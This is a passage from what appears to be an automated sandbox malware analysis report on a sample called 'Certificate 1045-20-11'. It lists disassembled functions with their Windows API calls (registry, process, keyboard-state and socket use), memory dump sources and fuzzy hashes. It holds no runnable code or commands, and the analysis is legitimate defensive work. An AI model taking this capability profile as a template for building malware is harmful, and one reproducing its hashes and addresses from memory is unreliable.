                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0087CA4E
                                                                                • EnumChildWindows.USER32(?,0087CAC4), ref: 0087CA76
                                                                                • __swprintf.LIBCMT ref: 0087CA90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                • String ID: %s%d
                                                                                • API String ID: 3187004680-1110647743
                                                                                • Opcode ID: 50a717e5d79eaeb1e6dc24011177d5eb96d52678e32f2ec6d939e95035ffe780
                                                                                • Instruction ID: a057295b44501bb66dfb29ec9325e3c138203335b92e535917cf8a25b6739575
                                                                                • Opcode Fuzzy Hash: 50a717e5d79eaeb1e6dc24011177d5eb96d52678e32f2ec6d939e95035ffe780
                                                                                • Instruction Fuzzy Hash: E0119DB16002196BCB11BFA48C86FA97B78FB44714F00807AFA1CEB186DB749546CB72
                                                                                Function 008A1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008A19F3
                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008A1A26
                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008A1B49
                                                                                • CloseHandle.KERNEL32(?), ref: 008A1BBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                • String ID:
                                                                                • API String ID: 2364364464-0
                                                                                • Opcode ID: 73bb98850d9ed0e7bea181c30794d7abf0236e3f5826b8e20542904605e20cff
                                                                                • Instruction ID: a4200c4fbcc9f087ce9508649abef1426fd298abcf0216f0752ee8e30dd33d37
                                                                                • Opcode Fuzzy Hash: 73bb98850d9ed0e7bea181c30794d7abf0236e3f5826b8e20542904605e20cff
                                                                                • Instruction Fuzzy Hash: 9E814370600214ABDF10AF68C886BADBBE5FF45720F148459F905EF382DBB5AD45CB91
                                                                                Function 00881C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00881CB4
                                                                                • VariantClear.OLEAUT32(00000013), ref: 00881D26
                                                                                • VariantClear.OLEAUT32(00000000), ref: 00881D81
                                                                                • VariantClear.OLEAUT32(?), ref: 00881DF8
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00881E26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                • Opcode ID: d4451a9be59a82c672b72d463a193b40aa7b317c3293cba675bb53026ecd11ec
                                                                                • Instruction ID: 863cafac8faf3f9b5ec9ab3fcc875d75f161d98e9a85ce30ae27a10cfacb7b60
                                                                                • Opcode Fuzzy Hash: d4451a9be59a82c672b72d463a193b40aa7b317c3293cba675bb53026ecd11ec
                                                                                • Instruction Fuzzy Hash: 985127B5A00209AFDB14DF58C884EAAB7B8FF4C314B158559E959DB301E730EA52CBA0
                                                                                Function 008A0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 008A06EE
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 008A077D
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 008A079B
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 008A07E1
                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 008A07FB
                                                                                  • Part of subcall function 0085E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0088A574,?,?,00000000,00000008), ref: 0085E675
                                                                                  • Part of subcall function 0085E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0088A574,?,?,00000000,00000008), ref: 0085E699
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 327935632-0
                                                                                • Opcode ID: 14d6094685b7a1143504a8faca694889116ed7d55a42828a81588387e53c5ee8
                                                                                • Instruction ID: cabb3c4b1d066f978818b019db0196a46f66a0a6e732441eb69f4be0aa3702be
                                                                                • Opcode Fuzzy Hash: 14d6094685b7a1143504a8faca694889116ed7d55a42828a81588387e53c5ee8
                                                                                • Instruction Fuzzy Hash: 5F512575A002099FDB00EFA8C881DADB7B5FF59310B14806AE915EB352DB35EE45CF81
                                                                                Function 008A2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 008A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A2EEF
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008A2F2E
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008A2F75
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 008A2FA1
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 008A2FAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 3740051246-0
                                                                                • Opcode ID: b7d5fd7ef1e25a17863ad5ac0e731a97c3b6d6cbff52b30ec5b363f9d2c5bd32
                                                                                • Instruction ID: 30d316119f5d12926a621d71bfc8ee57d5cbe77f30673b624162e850aee1f972
                                                                                • Opcode Fuzzy Hash: b7d5fd7ef1e25a17863ad5ac0e731a97c3b6d6cbff52b30ec5b363f9d2c5bd32
                                                                                • Instruction Fuzzy Hash: 7A512771208308AFE714EB68C881E6AB7F9FF89314F04892DF595D72A1DB70E905CB52
                                                                                Function 008ACCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 132de7c6b1f59f41ff351752d2f1a2062ddfb8b4b95490fd4cc24af1da6f389c
                                                                                • Instruction ID: 4964d7ddacba187cd43a93295d0ccd84da6aca5597775ee804320a74d32c1882
                                                                                • Opcode Fuzzy Hash: 132de7c6b1f59f41ff351752d2f1a2062ddfb8b4b95490fd4cc24af1da6f389c
                                                                                • Instruction Fuzzy Hash: D441A379900208AFEB24DF68CC44FA9BFB8FB0A314F150265F95AE76D1C770AD51DA90
                                                                                Function 00891206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008912B4
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008912DD
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0089131C
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00891341
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00891349
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1389676194-0
                                                                                • Opcode ID: ddb34a42bbd162e63a253bdd8c361ddad3f253146ad34f8892316396a12a28f2
                                                                                • Instruction ID: f079cf934ff8e5b0d0b35ef4c8cfe9edf46f534f9c943f48c6bcf2acc8c14f5d
                                                                                • Opcode Fuzzy Hash: ddb34a42bbd162e63a253bdd8c361ddad3f253146ad34f8892316396a12a28f2
                                                                                • Instruction Fuzzy Hash: C0411C35600209DFCF11EF68C985AAEBBF5FF09714B148099E94AAB362DB31ED01DB51
                                                                                Function 0085B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32(000000FF), ref: 0085B64F
                                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 0085B66C
                                                                                • GetAsyncKeyState.USER32(00000001), ref: 0085B691
                                                                                • GetAsyncKeyState.USER32(00000002), ref: 0085B69F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                • Opcode ID: 262306ddb61f93ba3b32da794370d7a9790eed96480ae904e29f5f77457dbc14
                                                                                • Instruction ID: 146d7df839a3868dad5cd6d5c5945ae3699e8cd8ef549c55d5e31b51051adfa1
                                                                                • Opcode Fuzzy Hash: 262306ddb61f93ba3b32da794370d7a9790eed96480ae904e29f5f77457dbc14
                                                                                • Instruction Fuzzy Hash: 07417C31508209FBDF199F68C844AE9BBB4FB15325F204219F829D6290DB30AD94DBA1
                                                                                Function 0087B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 0087B369
                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 0087B413
                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0087B41B
                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 0087B429
                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0087B431
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: e4ca8abf1c4c492ab7549b2ef8b4780093ce771ca7cfdba7e3846acc531ae544
                                                                                • Instruction ID: 04a054e0a119cc627358609a94f411e23df366210010f22c4266e57f46b3722d
                                                                                • Opcode Fuzzy Hash: e4ca8abf1c4c492ab7549b2ef8b4780093ce771ca7cfdba7e3846acc531ae544
                                                                                • Instruction Fuzzy Hash: 4431ABB1900219EBDB04DF68D949B9E7BB6FB04319F118229F825EA2D1C3B0D954CB90
                                                                                Function 0087DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0087DBD7
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0087DBF4
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0087DC2C
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0087DC52
                                                                                • _wcsstr.LIBCMT ref: 0087DC5C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                • String ID:
                                                                                • API String ID: 3902887630-0
                                                                                • Opcode ID: ee32f5fc8cf5c8d73685801440363f720115f73d3e1138cde81c9c94d7e0761b
                                                                                • Instruction ID: ef5959b866a0f8bbb190e0db97e5e03d3ab5f15cf69520bb5cd89496274e38ef
                                                                                • Opcode Fuzzy Hash: ee32f5fc8cf5c8d73685801440363f720115f73d3e1138cde81c9c94d7e0761b
                                                                                • Instruction Fuzzy Hash: 1E210A71204304BBEB155B399C49E7B7BB8FF85760F148039F90DCA295EAB1CC41D6A1
                                                                                Function 0087BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0087BC90
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0087BCC2
                                                                                • __itow.LIBCMT ref: 0087BCDA
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0087BD00
                                                                                • __itow.LIBCMT ref: 0087BD11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow
                                                                                • String ID:
                                                                                • API String ID: 3379773720-0
                                                                                • Opcode ID: 10d895b19de91f721a47bdde72d4909b22a979ba214d05203eebb3cfc01085c9
                                                                                • Instruction ID: c8e1e0ca0df27fa89024f9a64ed0a238ae5bf4c845a05ec776269e7a098a6cc9
                                                                                • Opcode Fuzzy Hash: 10d895b19de91f721a47bdde72d4909b22a979ba214d05203eebb3cfc01085c9
                                                                                • Instruction Fuzzy Hash: 8821DB75600718BBDB21AE698C46FDF7B69FF99710F008025F949EB182DB70CD0587A2
                                                                                Function 00886318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 008450E6: _wcsncpy.LIBCMT ref: 008450FA
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,008860C3), ref: 00886369
                                                                                • GetLastError.KERNEL32(?,?,?,008860C3), ref: 00886374
                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,008860C3), ref: 00886388
                                                                                • _wcsrchr.LIBCMT ref: 008863AA
                                                                                  • Part of subcall function 00886318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,008860C3), ref: 008863E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                • String ID:
                                                                                • API String ID: 3633006590-0
                                                                                • Opcode ID: fa517e86c9aa5c6ec3dadedce873baee02957a73d72a9e9af1e443500df85478
                                                                                • Instruction ID: 806ae39a661b1936e3c37de19e55bdf1bf2725229d5d445844f95a409dd77542
                                                                                • Opcode Fuzzy Hash: fa517e86c9aa5c6ec3dadedce873baee02957a73d72a9e9af1e443500df85478
                                                                                • Instruction Fuzzy Hash: FA21F3319042199BDB21BA78AC42FEA23ACFF06361F10007AF445D32C1FB60E9948B55
                                                                                Function 00898B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0089A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0089A84E
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00898BD3
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898BE2
                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00898BFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 3701255441-0
                                                                                • Opcode ID: c0eabe40acfbd9c6ab80f6fc9ddd4793f062c623db7c2c10f36bdd3399e921e6
                                                                                • Instruction ID: e9880b42627c6030ac5dd499c5214ad2bd0629ff8ff34c7d7e44c537db03a76d
                                                                                • Opcode Fuzzy Hash: c0eabe40acfbd9c6ab80f6fc9ddd4793f062c623db7c2c10f36bdd3399e921e6
                                                                                • Instruction Fuzzy Hash: 8E216D312002159FDB10BF68C885F7E77A9FB49764F084459F956EB292CE74AC018B62
                                                                                Function 00898420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 00898441
                                                                                • GetForegroundWindow.USER32 ref: 00898458
                                                                                • GetDC.USER32(00000000), ref: 00898494
                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 008984A0
                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 008984DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
                                                                                • API String ID: 4156661090-0
                                                                                • Opcode ID: 4ca6c94c7c2d5521dc3c3d51cdd14e46e60a23c35d5eaca2e97b7e4fe797dab0
                                                                                • Instruction ID: 223b36f6588e87e0ab089fefea2a7f82e4a75d67bb6c8f33027b81036825a207
                                                                                • Opcode Fuzzy Hash: 4ca6c94c7c2d5521dc3c3d51cdd14e46e60a23c35d5eaca2e97b7e4fe797dab0
                                                                                • Instruction Fuzzy Hash: AB218475A00205AFDB00EFA8D845E5EBBF5FF49301F048479E85AD7251DB70AD00CB91
                                                                                Function 0085AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0085AFE3
                                                                                • SelectObject.GDI32(?,00000000), ref: 0085AFF2
                                                                                • BeginPath.GDI32(?), ref: 0085B009
                                                                                • SelectObject.GDI32(?,00000000), ref: 0085B033
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: b5b8919717f411fcc42c7592a28b67c134d10dd308629937909a6bffaf9e5a63
                                                                                • Instruction ID: 8801079dc523a3c8e28ba2cbf139e8975a44804c5ab97a86be354edebc2a8ca0
